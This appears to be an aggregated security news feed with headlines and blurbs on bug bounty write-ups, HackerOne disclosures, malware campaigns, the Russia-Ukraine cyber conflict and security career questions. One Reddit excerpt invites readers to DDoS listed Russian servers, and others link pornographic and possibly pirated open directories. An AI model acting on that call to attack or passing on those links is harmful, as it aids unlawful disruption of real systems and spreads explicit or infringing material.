    Hello fellow hackers, today I will discuss how I found a Server-Side Request Forgery (SSRF) which led to a Local File Inclusion (LFI)… Continue reading on Medium »
  • Open

    Alan c2 Framework v6.0: Alan + JavaScript = ♡
    submitted by /u/aparata_s4tan [link] [comments]
  • Open

    Bypass Email Verification in Customer Portal
    Mattermost disclosed a bug submitted by odx09: https://hackerone.com/reports/1443211 - Bounty: $150
  • Open

    Android App Pentest
    Just got into Android App pentest. The app has a functionality to purchase courses. So what can be the best way to bypass it? Intercepting it through Burp and trying some manipulation as we do in web apps? Or some reverse engineering stuff will work here (which I don't think makes sense). If anybody has any experience pentesting apps with similar functionalities, your help is appreciated!! submitted by /u/Chirag_Offsec22 [link] [comments]
    Moving Into cyber security!
    Switching careers into security Hey everyone! So fairly new to the IT world, as title says I’m switching careers from being an executive chef for the past 16 years into cyber security. I’m starting a 6 month boot camp soon with GSU and afterwards I’ll get my sec+. I’ve been doing a lot of my own research by reading as much as I can, being active in a lot of different forums and have already put 50+ hours on tryhackme (which has been awesome) and putting a lot of work into my home network! The goal is to try and get into a SOC position or something similar and skip the help desk, I’m hoping some of the leadership, team building and communication skills i learned being a chef can help me land these roles. Is there anything I can be doing in the meantime to further help myself? How does this plan sound? Any advice is super helpful!! submitted by /u/Immediate-Ad-8996 [link] [comments]
    I'm getting POST requests from China, a Ukrainian data center, a TOR exit node, and others to my personal project server, any idea what is going on here?
    TL;DR I'm getting POST requests from China, a Ukrainian data center, a TOR exit node, and others to my personal project server, I want to know more and don't know what to do. For some time now, I've been building a cryptocurrency trading bot, but I've left it aside for some time now, letting it collect data while I do other stuff. It will be there when I get back to it. Now that I am thinking of getting back to it, I decide to check in. So, I SSH into my home server, connect to the screen instance, and realize that I'm getting frequent (~1/min) POST requests from some IPs I don't recognize. Now, the only HTTP requests this app is supposed to make are GET requests to the exchange (Kraken) every 5 minutes, so something strange is going on here. In the console, I see multiple lines that l…
  • Open

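    Open-source remote server management toolbox: UltimateShell
    Provides a wealth of customized features for penetration testers, programmers, webmasters, IT administrators and almost any user who needs a simpler way to handle remote work.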
  • Open

    Spear Phishing Attacks Target Organizations in Ukraine, Payloads Include the Document Stealer OutSteel and the Downloader SaintBot
    An attack in early February targeted an energy organization in Ukraine with OutSteel and SaintBot. The attack is part of a larger campaign. The post Spear Phishing Attacks Target Organizations in Ukraine, Payloads Include the Document Stealer OutSteel and the Downloader SaintBot appeared first on Unit42.

  • Open

    Russian-manufactured armored vehicle vulnerability in urban combat (1997)
    Article URL: https://man.fas.org/dod-101/sys/land/row/rusav.htm Comments URL: https://news.ycombinator.com/item?id=30473688 Points: 52 # Comments: 49
    OpenVAS – Open Vulnerability Assessment Scanner
    Article URL: https://openvas.org/ Comments URL: https://news.ycombinator.com/item?id=30469493 Points: 1 # Comments: 0
    Termux Apps Vulnerability Disclosures
    Article URL: https://termux.org/general/2022/02/15/termux-apps-vulnerability-disclosures.html Comments URL: https://news.ycombinator.com/item?id=30468679 Points: 2 # Comments: 0
    CISA: Zabbix servers under attack with recently disclosed vulnerability
    Article URL: https://therecord.media/cisa-zabbix-servers-under-attack-with-recently-disclosed-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=30466266 Points: 5 # Comments: 0
  • Open

    Bug Bounty: My Work Schedule
    According to the 2020 H1 report: Continue reading on Medium »
    Less than 24 Hours Left For Infosec Writeups Virtual Cybersecurity Conference
    Booked your tickets for IWCON2022 yet? Continue reading on InfoSec Write-ups »
    Authentication Bypass in Admin Panel
    This is my second write-up about finding a bug in an admin panel and how I escalated the severity from Low to critical Continue reading on Medium »
    PORTSWIGGER WEB SECURITY - CSRF (CROSS SITE REQUEST FORGERY) LAB SOLUTIONS
    CSRF (Cross-Site Request Forgery) makes it possible for an authenticated user to perform unwanted actions on a web page… Continue reading on Medium »
    B̶a̶k̶e̶ Hack your cake!
    “If you can’t bake a cake then hack the entire cake shop” — Vivek Coelho Continue reading on InfoSec Write-ups »
    10 ways to get RCE From LFI
    this illustrates multiple ways to upgrade your LFI to RCE Continue reading on Medium »
    Golden/Silver Ticket Attack | Kerberos | Active Directory |
    In this blog, we are going to talk about golden and silver ticket attacks. Continue reading on Medium »
    A Weird Price Tampering Vulnerability
    Well, Hello Pirates!!!!!!!!!!!!!!!!!!!!!!!!! Long Time No See :D Continue reading on Medium »
    Give me a browser, I’ll give you a Shell
    A restricted browser, that’s all you have… what do you do? Continue reading on Medium »
    Bypassing default visibility for newly-added email in Facebook(Part II - Trusted Contacts)
    After 3 months, I managed to bypass again the default visibility for newly-added email in Facebook. Here is the link to my first write-up… Continue reading on Medium »
  • Open

    Razzlekahn Part 1: Establishing Some Background.
    If you haven’t seen my introduction to this case, please take a few minutes and check out Untangling the Razzlekahn Conspiracy: An OSINT… Continue reading on Medium »
    Untangling the Razzlekahn Conspiracy: An OSINT Perspective.
    Six years ago, 200,000 Bitcoin were stolen from the Bitfinex exchange. The coins remained largely untouched until 2017 when some of the… Continue reading on Medium »
    How to Set Up MISP (Malware Information Sharing Platform)
    MISP (Malware Information Sharing Platform) is a free, open source threat intelligence platform that can store, correlate, and share IoCs… Continue reading on Medium »
    Mosint
    What is mosint ? Continue reading on Medium »
  • Open

    How to Decrypt the Files Encrypted by the Hive Ransomware
    submitted by /u/CyberMasterV [link] [comments]
    Pentest-tool: Simple and secure web deployment for pentest and redteam with simwigo
    submitted by /u/B1che [link] [comments]
    BGP Security in 2021
    submitted by /u/danyork [link] [comments]
    Catching bugs in VMware: Carbon Black Cloud Workload Appliance and vRealize Operations Manager
    submitted by /u/scopedsecurity [link] [comments]
  • Open

    [AWC-Pune] - User can download files deleted by Admin using shortcuts
    Lark Technologies disclosed a bug submitted by prateek_thakare: https://hackerone.com/reports/1463028 - Bounty: $550
    [Android] Directory traversal leading to disclosure of auth tokens
    Slack disclosed a bug submitted by danielllewellyn: https://hackerone.com/reports/1378889 - Bounty: $3500
    Hackerone open redirect security alert bypass via view report as PDF
    HackerOne disclosed a bug submitted by iamr0000t: https://hackerone.com/reports/1386277 - Bounty: $500
  • Open

    Redteam-tool: Simple and secure web deployment for pentest and redteam with simwigo
    Simwigo is a cross-platform tool, written in Go, that allows you to quickly deploy a secure web service (with a nice and neat display:)). It was created to replace the use of tools such as SimpleHTTPServer and http.server from python. It implements additional features allowing easy file exchange. It can be used for a pentest or a redteam, as well as for personal use. An API token authentication, a white list system, and the use of TLS (automatic deployment via Let's Encrypt) are integrated and increase the security of the service. Check out the latest release: https://github.com/8iche/simwigo/ submitted by /u/B1che [link] [comments]
  • Open

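    [Security Advisory] Clash For Windows Remote Code Execution Vulnerability
    Recently, a remote code execution vulnerability in the open-source proxy tool Clash For Windows was disclosed on GitHub. Reportedly, the exploitation details and exploit code for this vulnerability have been published online, and it may already be exploited in the wild.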
  • Open

    Pentesting suite for Android suggestions
    Hey everyone, I am looking for a pentesting suite/app for Android, something similar to what cSploit and zANTI were back in 2014 - 2016, a quick solution to check for most of the basic vulnerabilities. I am aware of Kali NetHunter but, I would like something closer to an app, than a whole other operating system. Is anything like this still out there? I have been out of the Android community for the past 6 or so years. submitted by /u/ivaks1 [link] [comments]
    Does anyone think directory traversal/arbitrary file read is a super powerful vuln type?
    Let's just look at all the obvious uses for it: - auth bypassing/authorization bypassing - useful in rce chains. Now let me explain why it's a powerful vuln class. Say you find one on the login page of a website, you now have pre auth file read and for example could steal cached session cookies of an admin or crack a hash stored somewhere. This lets you escalate from a guest user all the way to super admin. Now let's say they patch this, in a lot of cases you can password spray a random user and find a post auth file read and now instead of an auth bypass it's more of an authorization bypass, now you're a normal user but can read admin areas and admin log files that may have juicy stuff. I've run into this scenario many times where they’ll patch a pre auth one but a post auth one quickly gets found. Definitely one of my favorite vulns out there. submitted by /u/Academic-Discount252 [link] [comments]
    Are there any interesting flaws or attacks against SFU’s or selective forwarding units? Would make for a novel bug bounty finding
    Most companies these days are moving towards SFU’s from p2p so it would be interesting to exploit low level sfu implementations for rce and maybe exploit the general logic of an sfu for ip disclosures etc. I haven’t seen like any research on SFU’s. One interesting idea is forcing other clients to connect to you by claiming you're an SFU server, not even sure if that's possible but would be interesting. submitted by /u/Academic-Discount252 [link] [comments]
    Reference for Snort/Suricata Flowbit Group Names
    I'm researching Snort "flowbit" group names (ex: http.dottedquadhost, userlogin, etc.). Yet, I cannot find any references that cover/explain the variety of group names that can be used. Does anyone know where I can find more information on how these group names are defined? submitted by /u/cyberphor [link] [comments]
    Is this worth it?
    I'm reading up on zero trust and keep hearing about it but I'm still trying to figure out what tools there are out there. I heard Cloudflare acquired Area 1 for zero trust, but has anyone heard of these guys? https://usenucleus.cloud/ submitted by /u/Ztsec [link] [comments]
    Could it be real helpful for defending Ukraine from Russia?
    A few minutes ago, I checked the Twitter of Recorded Future and Greynoiseio. Both of them announced that they would apply full resources and capabilities to support Ukraine in their fight against Russia. Trying to find a sub that can answer this... seems reasonable from someone that knows little about the cyber world. So... is it really helpful for defending Ukraine against Russia? https://twitter.com/cahlberg/status/1496874932273389569 https://twitter.com/Andrew___Morris/status/1496923545712091139 submitted by /u/Late_Ice_9288 [link] [comments]
    Question for cybersec seniors
    Hi guys, I have to do a report for uni and gotta ask some questions to a senior in cybersec/infosec since I am starting my career and I'm a junior. The requirement is that I "interview" someone and I don't know anyone in real life. I hope it's okay, thank you submitted by /u/Mokushi99 [link] [comments]
    What is the going rate for a zero day these days?
    Curious of what the going rate for a zero day is on the black market; or even the legit market. submitted by /u/me_z [link] [comments]
  • Open

    Less than 24 Hours Left For Infosec Writeups Virtual Cybersecurity Conference
    No content preview
  • Open

    Domain Escalation: PetitPotam NTLM Relay to ADCS Endpoints
    Introduction Will Schroeder and Lee Christensen wrote a research paper on this technique which can be referred to here. In ESC8 technique mentioned in the research The post Domain Escalation: PetitPotam NTLM Relay to ADCS Endpoints appeared first on Hacking Articles.
  • Open

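    Invoke-EDRChecker: A Powerful Tool for Detecting Host Security Products
    The tool performs detailed security checks on running processes, including process metadata, the DLLs loaded into the current process, and the metadata of each DLL.
    Exploring How to Build Foundational Data-Centric Data Security Capabilities
    Following a data-centric approach, this article reviews data identification, classification and grading, and basic protection, with a walkthrough and feature demonstration using open-source software.
    FreeBuf Morning Briefing | Serious encryption flaw disclosed in over 100 million Samsung phones; Ukraine recruits hackers to defend against Russian cyberattacks
    Several Ukrainian government websites went offline on Wednesday because of a large-scale distributed denial-of-service (DDoS) attack.
    Two Zabbix Vulnerabilities Added to CISA's Known Exploited Vulnerabilities List
    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two Zabbix vulnerabilities to its Known Exploited Vulnerabilities Catalog.
    FreeBuf Enterprise Group Discussion | Enterprise security budgets in a complex climate
    The Personal Information Protection Law, the Data Security Law, the log4 outbreak: how will the past year's frequent developments in the security community affect this year's enterprise security budgets?
    "Cloned" Games Appear in the Microsoft Store, Containing the Electron Bot Malware
    By cloning popular games such as Subway Surfers and Temple Run, Electron Bot has infiltrated the Microsoft Store.
    During the Russia-Ukraine War, the U.S. Warns That "MuddyWater" May Exploit the Chaos
    The United States and the United Kingdom have issued a warning that a hacking group confirmed to have Iranian state backing is carrying out digital attacks and other malicious activity against targets worldwide during the Russia-Ukraine war.
    Microsoft Exchange Servers Hacked to Deploy Cuba Ransomware
    The Cuba ransomware is exploiting Microsoft Exchange vulnerabilities to enter corporate networks and encrypt devices.
    Small Steps Make a Thousand Miles: White Hat 积木's Bug-Hunting Journey
    Nearly four years of bug hunting, from beginner to MVP.
    Study Finds Adult Content in the Metaverse Is Accessible to Underage Users
    According to a recent BBC investigation, children can access sexual content through the metaverse.
    Poorly Protected Microsoft SQL Databases Are Becoming Targets for Hackers
    Recent data shows that hackers are installing Cobalt Strike beacons on vulnerable Microsoft SQL databases to gain a foothold in target networks.
    Breaking! Global Hacker Groups Launch "Cyber War" Against Russia
    War makes people cherish hard-won peace all the more: we never cheer for war, but we do not fear it either.
    How to Use PHP Malware Finder to Detect Potentially Malicious PHP Files on a Host
    PHP Malware Finder is a powerful detection tool for host security and PHP security that lets researchers easily detect potentially malicious PHP files on their hosts or servers.
    FreeBuf Weekly | Monzo digital bank users targeted by phishing; Meyer discloses cyberattack affecting employees
    Happy weekend, FreeBufers! Here is this week's "FreeBuf Weekly", in which we summarize and recommend the week's top news, quality articles and handy tools so that you don't miss any of this week's highlights! Top news: 1. The White House attributes the Ukraine DDoS attacks to Russian GRU hackers 2. Users of the UK's Monzo digital bank are targeted by phishing 3. Dozens of OpenSea users have NFTs stolen, with losses exceeding $1.7 million 4. Sudden riches, defection, crackdown... the Conti ransomware group's surreal 2021 5. This kind of phishing e-mail
    Ukrainian Government and Financial Institutions Hit by Suspected Russian Hackers
    The malware was deployed on hundreds of devices on Ukrainian networks.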
  • Open

    SecWiki News 2022-02-25 Review
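    SecCrawler: a crawler and push service for daily security news by ourren; cheatsheet: InfoSec technical scrolls by ourren; Code analysis and automated refactoring by ourren; A practical guide to enterprise-grade intelligent security by ourren; An automated detection tool for cookie consent and GDPR violations by ourren; CodeQL meets Shiro550 by ourren; Backdoor vulnerability in the TP-Link WR740 router by ourren; Parallels Desktop virtual machine escape by ourren; Introduction to k8s security by ourren; For more of the latest articles, visit SecWiki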
  • Open

    CEH Practical Review/Guide — How to prepare and ace your exam in the first attempt
    My journey for CEH practical exam started when I applied for the scholarship sponsored by the EC-Council. The actual exam cost was 550$… Continue reading on Medium »

  • Open

    CVE-2022-23835: A security analysis of Visual Voicemail
    Article URL: https://gitlab.com/kop316/vvm-disclosure Comments URL: https://news.ycombinator.com/item?id=30461939 Points: 2 # Comments: 0
  • Open

    HermeticWiper: What We Know About New Malware Targeting Ukrainian Infrastructure (Thus Far)
    submitted by /u/jat0369 [link] [comments]
    A Detailed Analysis of the LockBit Ransomware
    submitted by /u/CyberMasterV [link] [comments]
    Understanding Threat Actor’s by @berkdusunur
    submitted by /u/EyeAccomplished5529 [link] [comments]
    The Bvp47 - a Top-tier Backdoor of US NSA Equation Group
    submitted by /u/eberkut [link] [comments]
    Logic Flaw Leading to RCE in Dynamicweb 9.5.0 - 9.12.7
    submitted by /u/Mempodipper [link] [comments]
  • Open

    Curious
    Out of curiosity, are my chances good to land a junior infosec job, SOC analyst, or a sysadmin position based on my work experience? It's not a lot and I am new to the IT field, but to sum it all up, the only work experience I have is when I was a Geek Squad agent at Best Buy, when I worked at a call center, and most recently I got a job as a junior help desk technician. I also have 0 certs by the way and I'm too lazy to send my actual resume hahaha submitted by /u/Jkarl0880 [link] [comments]
    Doubt on Session Cookies
    Hi, I am exploring Burpsuite and HTTP requests. I was convinced that a cookie was only set after login. I tried to intercept a (failed) login on a simple web form and I got this:
        POST / HTTP/1.1
        Host: markup.htb
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 32
        Origin: http://markup.htb
        Connection: close
        Referer: http://markup.htb/
        Cookie: PHPSESSID=33foj37c9f8tburjbdufbtu8ln
        Upgrade-Insecure-Requests: 1

        username=test&password=test
    I noticed that the Cookie header is already present, even before my request can reach the webserver. Can someone enlighten me on this? Thank you!! submitted by /u/g-simon [link] [comments]
    I found a major security flaw in Lens.com website, need advice on how to proceed
    I apologize if this is the wrong place to ask this question but here goes. Without getting into details I found a way to access a user account without permission. I submitted it to kb.cert.org (didn't know where else to submit it) but they said they don't handle issues with live websites, I also informed Lens.com but honestly they didn't seem to care and have since ghosted me. I don't want to release the details and risk the (I can only assume) 7 people who still use that terrible site but I'm not sure how else to bring enough attention to this to get them to fix it. Any advice? Thanks. submitted by /u/AngryHumanoid [link] [comments]
    Providing SSN over voicemail for employer to access fingerprinting results? is it safe? Says she will delete the voicemail when her meeting sends.
    Ends* not sends, typo. I got fingerprinted for a background check (I'm working in education, working at a private school) and have to tell my SSN to my employer so they can log in to a database to check the fingerprint results before I start. I'm not comfortable providing my SSN over email and one of my employers told me that was okay and I can give the employer in charge of it a call. I emailed the employee and she told me that she will be in a meeting until the day ends and asked if I could leave my SSN through voicemail, and she will delete the message once the meeting is over and will run the SSN through the database. She told me she couldn't do tomorrow since she was leaving the country and I need to give it before Monday, the day I start, to have the results checked. Is this safe to leave a voicemail with my SSN, even though she will delete it afterwards? Seems it's my only option, or should I just forget this job altogether if this is my only choice, or request someone else who is available to do it with? I think she is the only one..... Update: I decided to do it since time was ticking since I start Monday and the employer is off to another country tomorrow so I won't be able to connect with her, which I find very weird. Did I put myself at risk?? Probably. Did I feel immediate regret after doing it? Yes I did. Nervous as heck, I hope I will be fine after this. submitted by /u/lostspirit10 [link] [comments]
    RSA Netwitness
    Hi guys, I recently started working as QA in NW and wanted to check what folks on field actually think of it. Have you ever tried or had hands on with RSA Netwitness SIEM? Any feedback on UX, Threat hunting, correlation capabilities etc? Thanks! submitted by /u/Peanutbutter-0 [link] [comments]
    Is this tool worth it ?
    I've been following these guys for quite some time now, since a friend of mine working at a large insurance company told me they use the platform internally. But I'm still not sure whether it is worth it. A few days ago, they announced they went open-source, I gave it a try and it looks cool. I ran a network scan with multiple tools at the same time (nmap, tsunami, nuclei) and got back a full report with just a few commands. The thing is I am still confused on the difference between the open source and the paid version. Have you tried the platform before? Do you think it is worth the money? submitted by /u/deadlyhayena [link] [comments]
    Anyone know about difference between BGP and DNS communication?
    Hi guys, I'm a student in a software engineering major these days, and I'm interested in RPKI hijacking. I saw the news that by BGP hijacking, cryptocurrency is now in danger. As far as I know, RPKI is the certificate of the router, and without RPKI the risk of BGP hijacking is more dangerous. But I can't understand the difference between BGP and DNS communication. Of course I searched on Google, but it is too deep for me to understand. Please teach me the difference between BGP and DNS communication simply... (to the point where newbies can understand) submitted by /u/Late_Ice_9288 [link] [comments]
    vulnerable?
    Hi guys, how do I find out whether my own IP address is vulnerable atm? submitted by /u/alicia30765 [link] [comments]
  • Open

    How i Found Single click open redirect at xiaomi ( Arabic )
    Single click open redirect Peace be upon you, today I will write to you about how I found a vulnerability Continue reading on Medium »
    How I Hacked the Dutch Government with SQLi and Won the Famous T-Shirt?
    Hello, those who are at the computer day and night. Continue reading on Medium »
    Take part of our Bug Bounty Program
    As you well know Avacash.Finance is a fork of Tornado.cash in the Avalanche Blockchain, which means that we offer a fully decentralized… Continue reading on Medium »
    Mars Protocol offers up to $1 million payout in bug bounty program with Immunefi
    More than 20 contributors from around the world have spent nearly a year developing Mars from scratch in the Rust programming language… Continue reading on Medium »
    $$$ Bank Verification Bypass(Broken Object Level Authorisation)
    Hey Readers 👋, Hope you are doing great, Continue reading on InfoSec Write-ups »
  • Open

    ODs/Calibre servers from Russia
    In solidarity with ukrainian people, after the cyber attack of russian goverment against ukrainian digital assets to prepare their invasion, you're friendly invited to attack these servers located in Russia unto DDOS. Help us to complete this list : I hope the Russians love their children too ! Slava Ukraine ! submitted by /u/krazybug [link] [comments]
    Diff links to other places, funny music ect...
    Ok went for a wander and here are a few findings not claiming they are all new but just what I found on a rabbit hole day... https://www.pyrocam.com/files/Video/funny/ next... http://stephenleblanc.com/backup/stephen/projects/Alex%20recovered/BlackBerry/music/Media%20Sync/ next... http://ftp.dyslexicfish.net/music/ next http://mediamusic-journal.com/video/ next https://www.creativebone.co.uk/video next... http://projects.csail.mit.edu/video/history/robotics/ ​ cannabis stuff plus other... https://www.thevespiary.org/library/Files_Uploaded_by_Users/llamabox/ ​ Sounds language stuff... http://211.110.1.18/Suda_Data/ ​ cooking http://www.medigaplife.com/videos/recipes/ ​ Funny's old but still funny gif jpg ect... http://www.brainbox.cc/funny/ ​ Memes what was relevant then... http://www.mercilesstruth.com/memes/ ​ Funny yep just funny, some old chan stuff, vids evt... http://tajgoren.net/bildarkiv/Download/ http://tajgoren.net/bildarkiv/Download/Funny/ ​ Well movies music'ish just stuff... https://johnbot.org/Share/ ​ Lots of images. Stay out of the folder WTF... http://148.72.150.188/archive/access/images/ ​ Images funny'ish do not watch 'SickBoobie Choumi.wmv' http://www.amickracing.com/misc/ ​ Funny, music. MP4s and lots more... http://www.aircam6600.com/1/mp4/ ​ Ok well done if you got through them. You saw the hidden link...;0) submitted by /u/xanderTgreat [link] [comments]
    Just a few xxx links for now...
    Lots of xxx movies https://artserotica.com/videos/ Been posted before but still up http://salepute.fr Short Jav I think some pixelated... https://www.xxxx-videos.com as above... https://kijyoui-douga.com/wp-content/uploads/2017/07/?SD Jav as above http://javichuparadise.com/wp-content/videos/ Not sure if this meets the open directories guides... http://www.wo-fd.xyz/?/ Lots of images with a few vids... http://real-uksex.com/wp-content/uploads/ Lots of MP4's http://24.138.249.6/Peliculas/Adultos/ What it says in the link Mandy Flores porn life images... https://mandyflores.com/content/ Bit of good old BDSM http://213.32.1.25 submitted by /u/xanderTgreat [link] [comments]
  • Open

    The Top-Notch Red Team Penetration Testing Services in Israel, USA, UK
    Continue reading on Medium »
  • Open

    Dispatch From The Digital Fringes (01.022022)
    Welcome to our launch here on Medium! I’m Matt Schultz — former Digital Archivist, Curator & Preservationist. I’m so excited to be… Continue reading on Medium »
    The ultimate guide to threat intelligence for corporate security
    This definitive guide to threat intelligence provides everything you need to know about implementing and using threat intelligence within… Continue reading on Medium »
  • Open

    SecWiki News 2022-02-24 Review
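    Abusing ESC7 in AD CS by ourren; Three precise definitions of threat intelligence by ourren; Leveraging machine learning to find security vulnerabilities by ourren; Research report on the state of behavioral security in the mobile internet app supply chain (SDKs) by ourren; A BERT-based method for measuring policy compliance of web services by ourren; LastPyMile - identifying discrepancies between a package's source code and its released code by ourren; A summary of security datasets for machine learning by ourren; How does Xloader encrypt its C&C communication? by Avenger; For more of the latest articles, visit SecWiki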
  • Open

    SockDetour – a Silent, Fileless, Socketless Backdoor – Targets U.S. Defense Contractors
    SockDetour is a custom backdoor being used to maintain persistence, designed to serve as a backup backdoor in case the primary one is removed. The post SockDetour – a Silent, Fileless, Socketless Backdoor – Targets U.S. Defense Contractors appeared first on Unit42.
  • Open

    Zero-day XSS vulnerability in Horde webmail client can be triggered by
    Article URL: https://portswigger.net/daily-swig/lt-p-gt-zero-day-xss-vulnerability-in-horde-webmail-client-can-be-triggered-by-file-preview-function-lt-p-gt Comments URL: https://news.ycombinator.com/item?id=30453652 Points: 2 # Comments: 0
  • Open

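    After Leaving a Job, Would You Access Your Former Company's Accounts?
    A sound offboarding process can reduce the harm departing employees do to their former employer.
    FreeBuf Morning Briefing | U.S. receives ransomware warning; hundreds of Ukrainian computers hit by wiper malware
    A Nigerian national pleaded guilty in the U.S. District Court for the Southern District of New York to breaking into a company's accounts and stealing payroll deposits.
    Russia Launches Lightning War on Ukraine; the Cyber War Began Long Ago
    The Russia-Ukraine conflict has been escalating for a long time.
    Social Media Attacks Set Another Record in 2021, with Financial Security Still Topping the List
    Social media has become one of the channels hackers use to distribute threats; the number of attacks through this channel increased by two times over the course of 2021.
    Ransomware Extortion Does Not Stop After the Ransom Is Paid
    A global survey of ransomware victims' experiences highlights how untrustworthy ransomware actors are: in most cases where the ransom was paid, the extortion continued.
    March 11, 19:00 | Building Asset Identification Capabilities on Top of Security Infrastructure
    At 19:00 on Friday, March 11, 阿刻, a senior security expert in Alibaba Group's security department, will present an open class titled "How to Build Asset Identification Capabilities on the New Security Infrastructure".
    ASUS Subsidiary ASUSTOR Attacked, with Ransom Demands Exceeding Ten Million Yuan
    The ransomware attack affected many users worldwide and sparked extensive discussion on the ASUSTOR forum.
    Operations and Management of Data Center Infrastructure
    To standardize the operations management of data center infrastructure, enterprises and public institutions should follow the relevant national standards in establishing an operations management system, policies, processes and other measures, ensuring that IT-based business runs securely, stably and normally.
    Nigerian Hacker Uses Credential Stuffing to Pocket Other People's Wages
    Starting in July 2017, the attacker compromised a total of 5,500 user accounts and transferred $800,000 in all.
    Security, Season One: [Nothing Is Trivial; Security Comes First]
    A virus is a program that covertly infects a computer system and causes damage. Virus code lies hidden in other programs, the disk partition table or the boot sector, waiting for its moment
    Microsoft Insight: Identity Management Weaknesses Become the Top Threat to Digital Security
    Over the past two years, the new normal shaped by the pandemic has accelerated digital transformation worldwide, and digital capability has become a core capability for the survival and development of businesses and individuals.
    Cybercrime Case Analysis: Illegally Obtaining App Data (42)
    Illegally obtaining app data for personal gain constituted the crime of illegally obtaining computer information system data, and the defendant was sentenced to four years and six months in prison.
    No Visibility, No Security! Ten Foreign SASE Vendors Worth Watching (2022 Edition)
    Traditional network security measures will no longer be adequate for complex network architectures; improving network visibility will be an important trend in the development of network security protection technology.
    Daiwa Securities (China) Is Hiring! Information Security Management Positions Open for Applications
    Daiwa Securities (China) Co., Ltd. is a newly established foreign-controlled securities company based in Beijing, China.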
  • Open

    Getting Started with Fuzzing in Go
    Release 1.18 will add support for fuzzing. Continue reading on Medium »
  • Open

    Backdoor Vulnerability in the TP-Link WR740 Router
    Author: IOTsec-Zone Original link: https://mp.weixin.qq.com/s/SWFLV6H1zKWQyvnC0JGGhg 0x00 Description Test environment: Ubuntu 18.04 Firmware version: wr740nv1_en_3_12_4_up(100910).bin Vendor: TP-Link Vendor site: https://www.tp-link.com.cn/ ZoomEye search app:TP...
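    CodeQL Meets Shiro550
    Author: SummerSec This article is an author submission. Seebug Paper looks forward to your contributions; every accepted submission earns a gift! Submission email: paper@seebug.org Built into the JDK As mentioned in the previous article, the query in JDK8u returned results: in total there are 7 classes that can replace the ComparableComparator class. However, only two of them can be instantiated and called directly, String#CASE_INSENSITIVE_ORDER and AttrCompare; the other 5 classes' permissions...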

  • Open

    [NSFW] Pornographic Images
    Public nudity - enjoy https://public.flashingjungle.com/exhibitionism/ submitted by /u/-Phinet- [link] [comments]
    DorkSearch is a tool that gives you a list of prebuilt templates for Google Dorks for different use cases.
    submitted by /u/pentestscribble [link] [comments]
    Hollywood Movies 1900-2020 - If download is slow, cancel and try again after 30 seconds.
    submitted by /u/SatansMoisture [link] [comments]
    Bit more porn...
    This site I have already ripped and made into torrent but it's still up... itaporno Remember use a VPN if you rip it... submitted by /u/xanderTgreat [link] [comments]
  • Open

    Looking for Place to Find latest Computer Forensic Case News
    I'm currently enrolled in a Digital Forensics class and have to do a project where we do a presentation on a current technology or case in Digital Forensics. Anybody know of a good way to find these articles, like what to put in the search bar or what websites to best check out? submitted by /u/Mattdarkninja [link] [comments]
    Windows 10 reset artifacts
    Can someone help me to find traces of artifacts left on windows 10 machine which has been reset 5 months back and repurposed to another user? A reference material on finding windows 10 reset and refresh artifacts will be very useful. Also, suggestions on any tool that can be used to recover data. submitted by /u/Pepperknowsitall [link] [comments]
    Putting user behind keyboard/knowledge
    If files are found automatically synced to a computer, no evidence that suspect had knowledge of them (folder never opened, file never viewed)… also the file was not downloaded by any deliberate action. Cannot determine who uploaded them in the first place or device used to do so Is it enough to make a case based on name on the account when multiple individuals reside at a place? submitted by /u/Complete-Cockroach80 [link] [comments]
    Newcomer to the field
    If this post is against rules in any way I apologize and please take it down. Greetings everyone. I graduated last year and got my bachelors in digital forensics and decided to stay in my country for a while and try to get a job here (Puerto Rico). Sadly I have not and am considering moving to the US and get a job there. Any advice? Sites to search for job offers for this area for graduates? States I should stay away from because of high cost of living? Any help I would appreciate greatly. submitted by /u/andrew9514 [link] [comments]
  • Open

    Automating bug bounties
    submitted by /u/pedro_benteveo [link] [comments]
    The vulnerability research team @GitLab is introducing an open-source community-driven advisory database for third-party security dependencies
    submitted by /u/howie1001 [link] [comments]
    Remote Code Execution in pfSense <= 2.5.2
    submitted by /u/smaury [link] [comments]
    tmp.0ut Volume 2
    submitted by /u/VVX7 [link] [comments]
    You can still CSRF POST requests under the default browser SameSite cookie policy. How to jump through the required hoops.
    submitted by /u/MysteriousHotel3017 [link] [comments]
    Cyrus SASL 2.1.28 has been released with SCRAM improvements and CVE fixes
    submitted by /u/Neustradamus [link] [comments]
  • Open

    Bug Bounty: Do You Need To Be A Programmer?
    Disclaimer: we are talking about the research of web applications only. Continue reading on Medium »
    Beginner Bug Bounty Journey
    # Introduction Continue reading on Medium »
    What You can Learn from Coinbase Hack with USD250k Bounty
    As a bug bounty hunter, you may experience something like below: Continue reading on Medium »
    How to hunt for bug bounties
    The first step when looking for bug bounties is to get to know the target. Continue reading on System Weakness »
    2 Days Left for IWCON 2022 Virtual Infosec Conference & Networking Event
    Never attended a virtual networking event before? Your FAQs answered + Check our live demo here. Continue reading on InfoSec Write-ups »
  • Open

    How to use satellite imagery to visualise changes in landscapes
    And how those changes can help you chronolocate an event. Continue reading on Medium »
    Geolocating TikTok videos of Russian military vehicles near Ukraine
    A little persistence can help pinpoint locations Continue reading on Medium »
    Bus and Rocks— OSINT Challenge 19 and 20
    Quiztime (contributor @kollege and @mahrko) shared two OSINT quizzes with us. Both objects were kind of wired. For kollege's we have to… Continue reading on Medium »
  • Open

    Pentesting a windows box
    Hello everyone! Just a question: how do you start a Windows box? I have been doing some HTB these past few weeks and only testing the Linux boxes; now, how did you guys learn to pentest a Windows box? (I don't have any background on ActiveDirectory stuff) Thank you! submitted by /u/pldc_bulok [link] [comments]
    Implications of disabled, factory install of Facebook on Android device.
    I do not use Facebook, but it came pre-installed on my phone. I can't uninstall it because Zuck owns my phone, but I have disabled the app and reverted it to the original factory install. I'm concerned about having an extremely out-of-date version remaining, probably rife with security flaws. Does disabling the app effectively lock it out from receiving or transmitting? submitted by /u/spinfip [link] [comments]
    Email compromised, address spoofed, or elaborate phishing email?
